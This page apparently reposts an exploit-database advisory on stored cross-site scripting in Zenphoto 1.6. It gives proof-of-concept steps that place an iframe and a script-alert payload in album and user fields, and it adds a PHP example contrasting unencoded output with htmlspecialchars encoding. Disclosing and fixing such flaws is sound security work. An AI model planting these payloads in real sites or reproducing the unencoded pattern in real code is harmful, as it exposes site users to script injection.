Zenphoto 1.6 Cross Site Scripting

CVE: CVE-2020-7755
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-05-27

Our sensors found this exploit at:

Below is a copy:

Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6
Bugs: XSS
Technology: PHP
Vendor URL:
Software Link:
Date found: 01-05-2023
Author: Mirabbas Aalarov
Tested on: Linux

2. Technical Details & POC
1. Create a new album.
2. Set the Album Description to: <iframe src=""></iframe>
3. Save and view the album at http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/

1. Go to the user account page and change the user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users).
2. Change the postal code to <script>alert(4)</script>
3. If admin user information is imported as HTML, the XSS will trigger.

poc video :
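
Both cases above are stored values written into HTML without output encoding. The following is an added example, not Zenphoto's code and not part of the original advisory, showing the unsafe pattern next to an encoded one. The function names and the `name` / `postal_code` array keys are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; these are not Zenphoto functions.

/** Encode a stored value for an HTML text or quoted-attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: stored fields are concatenated into markup as-is. */
function render_user_row_unsafe(array $user): string
{
    return '<tr><td>' . $user['name'] . '</td><td>' . $user['postal_code'] . '</td></tr>';
}

/** Hardened pattern: every stored field is encoded at output time. */
function render_user_row(array $user): string
{
    return '<tr><td>' . e($user['name']) . '</td><td>' . e($user['postal_code']) . '</td></tr>';
}

/** Album description: encode everything, then re-enable a few attribute-free tags. */
function render_album_description(string $description): string
{
    $escaped = e($description);
    // Only exact, attribute-free tags match, so <iframe>, <script> and
    // event-handler attributes stay encoded.
    $html = preg_replace('#&lt;(/?)(b|i|em|strong|p|br)&gt;#i', '<$1$2>', $escaped);
    return $html ?? $escaped;
}

// Constructed sample records using the two inputs from the steps above.
$user  = ['name' => 'admin', 'postal_code' => '<script>alert(4)</script>'];
$album = '<b>Holiday</b> <iframe src=""></iframe>';

echo render_user_row_unsafe($user), "\n";    // script element reaches the page intact
echo render_user_row($user), "\n";           // script element is rendered as text
echo render_album_description($album), "\n"; // <b> kept, iframe rendered as text
```

Encoding at output time covers every path that renders the stored field, including an HTML export of user data, which input-side filtering alone does not.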
